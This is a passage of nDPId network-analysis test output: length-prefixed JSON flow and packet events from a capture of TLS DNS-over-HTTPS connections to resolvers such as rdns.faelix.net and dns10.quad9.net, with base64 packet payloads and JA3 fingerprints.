VLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jd
G+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD
9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zN
uwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R8
8DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53
x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6l
